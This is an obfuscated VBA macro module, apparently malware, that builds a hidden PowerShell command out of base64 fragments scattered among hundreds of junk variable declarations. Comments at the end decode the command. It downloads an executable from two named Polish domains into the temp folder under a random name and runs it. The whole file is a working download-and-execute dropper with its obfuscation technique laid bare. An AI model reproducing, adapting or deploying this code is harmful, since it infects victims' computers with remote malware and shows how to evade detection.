Attribute VB_Name = "Module3"
Public ps5q137M4 As String
Public Const iDjg96fA As Integer = 0

Sub aotpcxJ()
   Dim VQwPcoSRU As Byte
   VQwPcoSRU = 152
   Dim RQYwAGJM As String
   RQYwAGJM = vbNullString
   Dim fLBhVQt As Double
   fLBhVQt = 2412.4265265536
   Dim HpSZLY6 As String
   HpSZLY6 = Trim(AwXabi)
   Dim pNXMPW As Double
   pNXMPW = 34834.694122283
   Dim RgI6sQxO As Byte
   RgI6sQxO = 6
   Dim fqOzW As Single
   fqOzW = 40642.254130911
   Dim eFlNE As Double
   eFlNE = 31645.005158048
   Dim BufR7Ps As Integer
   BufR7Ps = Sgn(25534)
   Dim iXZvI4k6 As Boolean
   iXZvI4k6 = True
   Dim P15wU As Single
   P15wU = Sgn(27174.581642822)
   Dim QQF9E4 As Boolean
   QQF9E4 = False
   Dim qVdYgspy8 As Byte
   qVdYgspy8 = 244
   Dim YOx8L As Long
   YOx8L = 0
   Dim orhVLtWSA As Boolean
   orhVLtWSA = False
   Dim pT7Q24Z As Single
   pT7Q24Z = 7416.9589717869
   Dim g03GdwPzh As Single
   g03GdwPzh = 4578.6410898761
   Dim c1sY6ibm As Boolean
   c1sY6ibm = False
   Dim jflVR As Single
   jflVR = Sgn(13466.126384292)
   Dim BJ1hIA As Single
   BJ1hIA = 37373.424190736
   Dim e0AZ27IHW As Integer
   e0AZ27IHW = Sgn(12626)
   Dim iHT9edv As String
   iHT9edv = StrConv(vEzAG, vbUpperCase)
   Dim FoIyf As Byte
   FoIyf = 187
   Dim YBVDiLX9 As Long
   YBVDiLX9 = Sgn(0)
   Dim YpG6hZ2dY As Boolean
   YpG6hZ2dY = False
   
   Dim ufWLpBi6c As Boolean
   ufWLpBi6c = True
   Dim lzGPaQS As Boolean
   lzGPaQS = False
   Dim HL5Uel As Single
   HL5Uel = 1714.2932394574
   Dim Z2U7HLe As Single
   Z2U7HLe = Sgn(39605.331387477)
   Dim IkfNjz0hX As Long
   IkfNjz0hX = Sgn(-484060802)
   Dim kkXo5 As Integer
   kkXo5 = Sgn(-22378)
   Dim MYrX7 As String
   MYrX7 = "cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuI" ' here
   Dim Y1taBN7 As Double
   Y1taBN7 = Sgn(4920.4379772121)
   Dim p7VYdv As Long
   p7VYdv = 0
   Dim nIVrBpqf2 As Integer
   nIVrBpqf2 = -27874
   Dim BdCNvDbJ6 As Byte
   BdCNvDbJ6 = 14
   Dim kLIN3 As Integer
   kLIN3 = -5149
   Dim AQz4va As Single
   AQz4va = Val(12924.906448095)
   Dim AiVLJp As Integer
   AiVLJp = 12604
   Dim wAhulo As Byte
   wAhulo = 14
   Dim AhqgGJ4V As Single
   AhqgGJ4V = Val(19964.959921221)
   Dim ShDBZ As Long
   ShDBZ = Sgn(-631248652)
   Dim iLtoS
   iLtoS = StrConv(KsIamlNR, vbProperCase)
   Dim ZYq1xjrW As String
   ZYq1xjrW = Len(xUQG1B)
   Dim mAY9zqfb As Double
   mAY9zqfb = 4673.0842009013
   Dim dWF0rcNtZ As Double
   dWF0rcNtZ = 6776.1241893747
   Dim gKAEijypz As Integer
   gKAEijypz = Sgn(20596)
   Dim IS6YT1E As Byte
   IS6YT1E = 237
   Dim drL47G As Byte
   drL47G = 121
   Dim ypeCSJ8Dv
   ypeCSJ8Dv = "CR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudC"
   Dim Chraq1Wx As String
   Chraq1Wx = AscW("W")
   Dim OL38qPVw As Single
   OL38qPVw = Sgn(15165.676516431)
   Dim WeHIM As Single
   WeHIM = Val(52204.313555006)
   Dim ueGNZDv As Integer
   ueGNZDv = -26155
   Dim LYo0p As Double
   LYo0p = Fix(10761.217572621)
   Dim xcaXy9 As Double
   xcaXy9 = 6239.1583692885
   Dim NdLMOgjk ' here
   ' NdLMOgjk = "cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudC"
   NdLMOgjk = MYrX7 & ypeCSJ8Dv
   Dim gq8L6AK As Long
   gq8L6AK = -374519188
   Dim obC05sg As Long
   obC05sg = Sgn(0)
   Dim QCR8NDre As Double
   QCR8NDre = Round(4161.7837003362)
   Dim kxHcpr As Boolean
   kxHcpr = False
   Dim Y54M7 As Double
   Y54M7 = Val(46138.276709511)
   Dim V7ZKcrF As Boolean
   V7ZKcrF = True
   Dim KrqNl As Boolean
   KrqNl = True
   Dim iQUN32K As Boolean
   iQUN32K = True
   Dim AQnIRu As Boolean
   AQnIRu = True
   Dim iG3mQeV9 As Single
   iG3mQeV9 = Val(58768.708715386)
   Dim J6ZgRrx5H As String
   J6ZgRrx5H = "A9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJ"
   Dim Rd7MiAP As Double
   Rd7MiAP = Sgn(19054.742065475)
   Dim a71kez As Single
   a71kez = 17080.093431922
   Dim QaONKcMqH As Byte
   QaONKcMqH = 137
   Dim dwhH3T As Single
   dwhH3T = 41253.962953154
   Dim I3V0A71cG As Byte
   I3V0A71cG = 90
   Dim xO2YGVF5x As Single
   xO2YGVF5x = 48955.004801864
   Dim Kjc1M As Integer
   Kjc1M = 26619
   Dim SOIkio4hv As Byte
   SOIkio4hv = 78
   Dim QvrmpkCGt As Integer
   QvrmpkCGt = Sgn(-23864)
   Dim YxhOU1
   YxhOU1 = cTC0SU
   Dim OG24CdTzU As Boolean
   OG24CdTzU = False
   Dim Fg6vqoG5J
   Fg6vqoG5J = "hbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxz"
   Dim IMKfFVUH As String
   IMKfFVUH = Val("x")
   Dim pAi3HpWM As Integer
   pAi3HpWM = 884
   Dim zxF8HzOy
   zxF8HzOy = Val(IZ64zTELc)
   Dim WWvTMXYrn As Integer
   WWvTMXYrn = 22798
   Dim sGyW60SZe As Byte
   sGyW60SZe = 177
   Dim AH6wV
   AH6wV = UCase(qy2akR)
   Dim p7heqgfS9 As Long
   p7heqgfS9 = Sgn(0)
   Dim eRD4Pz As Boolean
   eRD4Pz = False
   Dim GJITmQU As Single
   GJITmQU = 49277.886449969
   Dim o9uh20ai As Long
   o9uh20ai = -2075772452
   Dim JCBXckKNT As Boolean
   JCBXckKNT = True
   Dim eri6EYFlG As Byte
   eri6EYFlG = 240
   Dim WNFK8l As Byte
   WNFK8l = 60
   Dim gORNov As Boolean
   gORNov = True
   Dim jcY7A As Byte
   jcY7A = 71
   Dim NhECd9 As Long
   NhECd9 = -1587439074
   Dim mClrgXO As Boolean
   mClrgXO = False
   Dim MINBlMn As String
   MINBlMn = "ID0gJ2h0d"
   Dim bvoQ21C As Integer
   bvoQ21C = Sgn(-12378)
   Dim s14kx As Single
   s14kx = Sgn(16016.42765711)
   Dim tDpW2O As Integer
   tDpW2O = Sgn(8186)
   Dim KRjFP As Long
   KRjFP = -1415914356
   Dim YyrlJ As Boolean
   YyrlJ = False
   Dim FqUEV
   FqUEV = Val(PiP3T)
   Dim J3CUGc As Single
   J3CUGc = Fix(26383.666352212)
   Dim TCr2ATDOs As Double
   TCr2ATDOs = Sgn(22819.035467168)
   Dim iZUjkQCn As Single
   iZUjkQCn = 28703.808441552
   Dim RyqgN As Boolean
   RyqgN = False
   Dim x1kvwHcI As Single
   x1kvwHcI = 46494.230485704
   Dim l2ZWwSif As Byte
   l2ZWwSif = 44
   Dim o8faINL As Double
   o8faINL = Val(30700.019734949)
   Dim fkVWea
   fkVWea = RTrim(PmNgKJY)
   Dim RysJdkc As String
   RysJdkc = Trim(JSLpUkVgv)
   Dim bzQ816wbh ' here
   bzQ816wbh = J6ZgRrx5H & Fg6vqoG5J & MINBlMn
   ' bzQ816wbh = "A9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJ" & "hbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxz" & "ID0gJ2h0d"
   Dim df8TV As Byte
   df8TV = 198
   Dim tJ9F6CY As Boolean
   tJ9F6CY = True
   Dim MwRgUBC As Boolean
   MwRgUBC = True
   Dim hfUp9
   hfUp9 = StrConv(F0YHlk, vbLowerCase)
   Dim D3AKeN As Double
   D3AKeN = Sgn(25640.791559107)
   Dim tu9ilMt As Long
   tu9ilMt = Sgn(0)
   Dim wblM23t As Integer
   wblM23t = -16973
   Dim jQHbATk As Boolean
   jQHbATk = True
   Dim K8PEtFOW
   K8PEtFOW = Len(tjxOW)
   Dim E2uoL46 As Byte
   E2uoL46 = 184
   Dim RagpxQH1B As Byte
   RagpxQH1B = 77
   Dim tflCwu As Double
   tflCwu = 35337.928186876
   Dim qP12zB As Integer
   qP12zB = -20814
   Dim Zfvpb As Long
   Zfvpb = Sgn(-1760597664)
   Dim fMSRph As Long
   fMSRph = -613692092
   Dim FbGrUO As Boolean
   FbGrUO = False
   Dim KRhjr
   KRhjr = "0LmdmZCcuU3BsaXQoJywnKTskbmFtZSA9ICRyYW5kb20ubm"
   Dim lk0EUH As Boolean
   lk0EUH = True
   Dim trv2OMFpd As Integer
   trv2OMFpd = -30737
   Dim WMGe7E As Single
   WMGe7E = Sgn(4181.4685811648)
   Dim NZWQ9UHou As Boolean
   NZWQ9UHou = True
   Dim OHelXrJ As Byte
   OHelXrJ = 147
   Dim fCEgDtP As Long
   fCEgDtP = Sgn(0)
   Dim SGskV2 As String
   SGskV2 = UCase(eqc58d6G)
   Dim efIunZr2 As Double
   efIunZr2 = Sgn(22619.642325078)
   Dim VXZhVk As String
   VXZhVk = AscW("n")
   Dim v8L7pkMBF As Byte
   v8L7pkMBF = 25
   Dim DksyH5eUI As String
   DksyH5eUI = "V4dCgxLCA2NTUzNik7JHBhdGggPSAkZW52OnRlbXAgKyAnXCcgKyAkbmFtZSArICcuZXhlJzt"
   Dim J9817j As Long
   J9817j = -306602520
   Dim YpxrS
   YpxrS = vbNullString
   Dim xdCiAhfB As Byte
   xdCiAhfB = 190
   Dim sEBvDzrFL As Double
   sEBvDzrFL = Sgn(7358.4579707706)
   Dim FcDYnXwPs As Single
   FcDYnXwPs = Sgn(13309.492905839)
   Dim E7miFZth As Double
   E7miFZth = Sgn(28064.925991463)
   Dim wxmG7hw As Byte
   wxmG7hw = 249
   Dim w0iky As Byte
   w0iky = 97
   Dim RY6aC As Byte
   RY6aC = 185
   Dim CDAkE As Double
   CDAkE = Int(27521.713867593)
   Dim zAup8 As Double
   zAup8 = 26816.264163618
   Dim pKtT5V
   pKtT5V = KRhjr & DksyH5eUI
   ' pKtT5V = "0LmdmZCcuU3BsaXQoJywnKTskbmFtZSA9ICRyYW5kb20ubm" & "V4dCgxLCA2NTUzNik7JHBhdGggPSAkZW52OnRlbXAgKyAnXCcgKyAkbmFtZSArICcuZXhlJz"
   Dim S96jXB As Byte
   S96jXB = 142
   Dim M0XxZ As Byte
   M0XxZ = 58
   Dim DhubA As Single
   DhubA = Fix(63376.575632711)
   Dim Mc1kjRsw As Integer
   Mc1kjRsw = Sgn(-27900)
   Dim q0bF1h As Integer
   q0bF1h = -4247
   Dim zklGeO As String
   zklGeO = UCase(PzB6jb4)
   Dim JLfxheE As Integer
   JLfxheE = Sgn(30085)
   Dim TzUsMCR9 As Double
   TzUsMCR9 = 12431.58476914
   Dim lSP1qhLQ As Single
   lSP1qhLQ = Sgn(15924.623208286)
   Dim cQxDc3Ieg As Double
   cQxDc3Ieg = Int(57083.811832953)
   Dim NLbJ6 As Single
   NLbJ6 = Sgn(25381.643711953)
   Dim oOKlXaxDm
   oOKlXaxDm = "Qcm9jZXNzICRwYXRoO2JyZWFrO31jYXRjaHt3c"
   Dim Bl3kzOLtA
   Bl3kzOLtA = Val("z")
   Dim nJMCBH3n As Integer
   nJMCBH3n = -28033
   Dim LFQXpg As Integer
   LFQXpg = -9518
   Dim EGuepv7
   EGuepv7 = StrConv(mXxJcgp4P, vbProperCase)
   Dim Nq2PTW As Single
   Nq2PTW = Sgn(36444.491898364)
   Dim CSXvYnC As Double
   CSXvYnC = Round(11351.852222453)
   Dim NOR0eDtb As String
   NOR0eDtb = "ml0ZS1ob3N0ICRfLkV4Y2VwdGlvbi5NZXNzYWdlO3"
   Dim N7tpbH As Single
   N7tpbH = 46704.59108159
   Dim qurV91Pt2 As Single
   qurV91Pt2 = Int(56820.261617552)
   Dim yKIjEA As Integer
   yKIjEA = -30557
   Dim lHCfU As Byte
   lHCfU = 84
   Dim Ftuq1BPQ As Single
   Ftuq1BPQ = Round(58786.461832426)
   Dim B5EbkH3yu As Long
   B5EbkH3yu = Sgn(-1433179790)
   Dim mKBxqPd2 As Long
   mKBxqPd2 = -1222940376
   Dim RatHBv7jI As Long
   RatHBv7jI = Sgn(0)
   Dim wKQCgy As Boolean
   wKQCgy = True
   Dim yCmYOH
   yCmYOH = "19"
   Dim rwl7t As Boolean
   rwl7t = False
   Dim RfWEjd As Boolean
   RfWEjd = False
   Dim guTvtfx As Double
   guTvtfx = Int(6680.0875967616)
   Dim v7t4oV As Single
   v7t4oV = 11790.711992922
   Dim vDdrw As Boolean
   vDdrw = True
   Dim qLm5o As Single
   qLm5o = Round(44853.3659526)
   Dim Ryu149j As Byte
   Ryu149j = 96
   Dim XvznL As Integer
   XvznL = Sgn(-815)
   Dim b1vys As Double
   b1vys = Val(6390.5440944226)
   Dim npZSwg
   npZSwg = oOKlXaxDm & NOR0eDtb & yCmYOH
   ' npZSwg = "Qcm9jZXNzICRwYXRoO2JyZWFrO31jYXRjaHt3c" & "ml0ZS1ob3N0ICRfLkV4Y2VwdGlvbi5NZXNzYWdlO3" & "19"
   Dim bZNPhV As Single
   bZNPhV = 4187.9543222193
   Dim o4Yq6ES As Byte
   o4Yq6ES = 161
   Dim vEX24 As Double
   vEX24 = Sgn(21625.062534098)
   Dim UqC9O As Double
   UqC9O = Sgn(25444.486596298)
   Dim BqRxl5om9 As Double
   BqRxl5om9 = 17042.684638931
   Dim jhr03 As Byte
   jhr03 = 233
   Dim OduEMbJt As Byte
   OduEMbJt = 81
   Dim LWDVMEtgk
   LWDVMEtgk = AscW("+")
   Dim qmNTi90 As Long
   qmNTi90 = 0
   Dim thsqa38jP As Single
   thsqa38jP = Sgn(42090.329059037)
   Dim b2LdIi As Double
   b2LdIi = Val(64861.70276136)
   Dim BTASOeq As Boolean
   BTASOeq = True
   Dim sh2H5Pl As Integer
   sh2H5Pl = 18459
   Dim cPBfazC8J As Byte
   cPBfazC8J = 160
   Dim Fj1dOR As String
   Fj1dOR = Len(YbkstYMm)
   Dim hJ3qRxb As Single
   hJ3qRxb = Sgn(37039.161673501)
   Dim W95iCy As String
   W95iCy = "HA6Ly9jb3N0ZmVyLnBsL2ZpbGUvb2Z0LmdmZCxod"
   Dim myOPkjKY As Integer
   myOPkjKY = Sgn(-28360)
   Dim SEqj8o As Single
   SEqj8o = Sgn(14621.631092265)
   Dim lfmjBM As String
   lfmjBM = vbNullString
   Dim rcAyPC3hj As Double
   rcAyPC3hj = 56687.097294561
   Dim cipPM As Long
   cipPM = -1084273724
   Dim dRbiZYpCx As Long
   dRbiZYpCx = 0
   Dim ja6f5 As Long
   ja6f5 = -629122432
   Dim LbXge As Integer
   LbXge = 2709
   Dim LKULr As Long
   LKULr = -464883968
   Dim Rjh9SY As Single
   Rjh9SY = Sgn(43966.277963051)
   Dim fulK2JP As Integer
   fulK2JP = Sgn(19412)
   Dim N6M9K As Integer
   N6M9K = -6233
   Dim y9uCxd As Double
   y9uCxd = 21944.078854116
   Dim jK9AH As Boolean
   jK9AH = False
   Dim gjDEemK
   gjDEemK = "HRwOi8vZ2xvcmlhc2V0LnBsL2ZpbGUvb2Z"
   Dim y7dZG6h As Integer
   y7dZG6h = 13763
   Dim wYB1cbJIv As String
   wYB1cbJIv = LTrim(VtTJdjOL)
   Dim zNv93ue8Y As String
   zNv93ue8Y = AscW("s")
   Dim ZDSp0N As String
   ZDSp0N = Val("Y")
   Dim qbISsA As Single
   qbISsA = 58640.883697055
   Dim VstH1QK As Double
   VstH1QK = Fix(27335.279939732)
   Dim aM3Wq As Integer
   aM3Wq = -10432
   Dim kPaupq ' here
   kPaupq = W95iCy & gjDEemK
   ' kPaupq = "HA6Ly9jb3N0ZmVyLnBsL2ZpbGUvb2Z0LmdmZCxod" & "HRwOi8vZ2xvcmlhc2V0LnBsL2ZpbGUvb2Z"
   Dim hQt6Sh2 As Boolean
   hQt6Sh2 = True
   Dim JDTegKp As Single
   JDTegKp = Fix(55887.809145644)
   Dim XhI8GH As Boolean
   XhI8GH = False
   Dim Ta5MzdhS As Double
   Ta5MzdhS = 51669.144826687
   Dim aTdeIgRbJ As Double
   aTdeIgRbJ = Sgn(23833.03167993)
   Dim WQOSg As Double
   WQOSg = Sgn(60847.642015383)
   Dim t0Wqro As Double
   t0Wqro = 63096.041362042
   Dim ce0jf3uMQ As Single
   ce0jf3uMQ = Sgn(9797.3108373851)
   Dim vuOi4 As Byte
   vuOi4 = 189
   Dim krYmQ7J As String
   krYmQ7J = Asc("2")
   Dim yyCuJDEjQ As Boolean
   yyCuJDEjQ = True
   Dim ftaxE As Double
   ftaxE = Sgn(49639.657032093)
   Dim GjTYMH As Integer
   GjTYMH = Sgn(249)
   Dim k9QtqE As Integer
   k9QtqE = 18141
   Dim N7SXF As Boolean
   N7SXF = True
   Dim P4ilU As Long
   P4ilU = Sgn(0)
   Dim dsrwZ As Integer
   dsrwZ = Sgn(2919)
   Dim cn5yOZMD As String
   cn5yOZMD = "mb3JlYWNoKCR1cmwgaW4gJHVybHMpe3RyeXskd2ViY2xpZW50LkRvd25sb2"
   Dim UdlapG As Integer
   UdlapG = -12017
   Dim VJLxdG As Double
   VJLxdG = Sgn(51603.620769803)
   Dim yM1V6Eq As Boolean
   yM1V6Eq = False
   Dim zh3HtMcF As Byte
   zh3HtMcF = 187
   Dim egHXZ As String
   egHXZ = LCase(LhyvCR)
   Dim UikIHA As Byte
   UikIHA = 59
   Dim UMO8pku As Byte
   UMO8pku = 47
   Dim VnOTeZ As Boolean
   VnOTeZ = True
   Dim B2T6F7zo As String
   B2T6F7zo = Trim(wSVMrR7)
   Dim EzNLQcW9F As Integer
   EzNLQcW9F = -14588
   Dim SbULW As Integer
   SbULW = 25579
   Dim H2lLu9 As String
   H2lLu9 = "FkRmlsZSgkdXJsLlRvU3RyaW5nKCksICRwYXRoKTtTdGFydC1"
   Dim n7yXDPo As Boolean
   n7yXDPo = True
   Dim ncPiRz As Byte
   ncPiRz = 85
   Dim gzhViZ As Double
   gzhViZ = Round(13136.993976905)
   Dim Pu3Eo6wy As Byte
   Pu3Eo6wy = 184
   Dim zPL89hMJD As Single
   zPL89hMJD = 38961.544013319
   Dim UejA2s As Long
   UejA2s = Sgn(0)
   Dim NqX4SsgZ As Integer
   NqX4SsgZ = Sgn(26828)
   Dim JTuOe5t As Double
   JTuOe5t = Sgn(17742.968589069)
   Dim DO73Jlu1
   DO73Jlu1 = cn5yOZMD & H2lLu9
   ' DO73Jlu1 = "mb3JlYWNoKCR1cmwgaW4gJHVybHMpe3RyeXskd2ViY2xpZW50LkRvd25sb2" & "FkRmlsZSgkdXJsLlRvU3RyaW5nKCksICRwYXRoKTtTdGFydC1"
   Dim SRNmvfiLr As Single
   SRNmvfiLr = Sgn(43327.35071384)
   Dim b2eKvCtp As Byte
   b2eKvCtp = 121
   Dim x3BLNYv As Byte
   x3BLNYv = 160
   Dim Az2r4 As Boolean
   Az2r4 = True
   Dim dnwxsBI As Integer
   dnwxsBI = Sgn(-21014)
   Dim N16SVN As Double
   N16SVN = 7971.0483103486
   Dim uh06mYMVP As Integer
   uh06mYMVP = 1058
   Dim YK83lHxbs As Boolean
   YK83lHxbs = True
   ps5q137M4 = NdLMOgjk & bzQ816wbh & kPaupq & pKtT5V & DO73Jlu1 & npZSwg



   ' NdLMOgjk = "cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudC"
   ' bzQ816wbh = "A9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0d"
   ' kPaupq = "HA6Ly9jb3N0ZmVyLnBsL2ZpbGUvb2Z0LmdmZCxodHRwOi8vZ2xvcmlhc2V0LnBsL2ZpbGUvb2Z"
   ' pKtT5V = "0LmdmZCcuU3BsaXQoJywnKTskbmFtZSA9ICRyYW5kb20ubmV4dCgxLCA2NTUzNik7JHBhdGggPSAkZW52OnRlbXAgKyAnXCcgKyAkbmFtZSArICcuZXhlJz"
   ' DO73Jlu1 = "mb3JlYWNoKCR1cmwgaW4gJHVybHMpe3RyeXskd2ViY2xpZW50LkRvd25sb2FkRmlsZSgkdXJsLlRvU3RyaW5nKCksICRwYXRoKTtTdGFydC1"
   ' npZSwg = "Qcm9jZXNzICRwYXRoO2JyZWFrO31jYXRjaHt3cml0ZS1ob3N0ICRfLkV4Y2VwdGlvbi5NZXNzYWdlO319"

   ' ps5q137M4 = "cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGlkZGVuICR3c2NyaXB0ID0gbmV3LW9iamVjdCAtQ29tT2JqZWN0IFdTY3JpcHQuU2hlbGw7JHdlYmNsaWVudCA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2h0dHA6Ly9jb3N0ZmVyLnBsL2ZpbGUvb2Z0LmdmZCxodHRwOi8vZ2xvcmlhc2V0LnBsL2ZpbGUvb2Z0LmdmZCcuU3BsaXQoJywnKTskbmFtZSA9ICRyYW5kb20ubmV4dCgxLCA2NTUzNik7JHBhdGggPSAkZW52OnRlbXAgKyAnXCcgKyAkbmFtZSArICcuZXhlJzmb3JlYWNoKCR1cmwgaW4gJHVybHMpe3RyeXskd2ViY2xpZW50LkRvd25sb2FkRmlsZSgkdXJsLlRvU3RyaW5nKCksICRwYXRoKTtTdGFydC1Qcm9jZXNzICRwYXRoO2JyZWFrO31jYXRjaHt3cml0ZS1ob3N0ICRfLkV4Y2VwdGlvbi5NZXNzYWdlO319"

   ' powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;
   ' $webclient = new-object System.Net.WebClient;
   ' $random = new-object random;
   ' $urls = 'http://costfer.pl/file/oft.gfd,http://gloriaset.pl/file/oft.gfd'.Split(',');
   ' $name = $random.next(1, 65536);
   ' $path = $env:temp + '\' + $name + '.exe'
End Sub
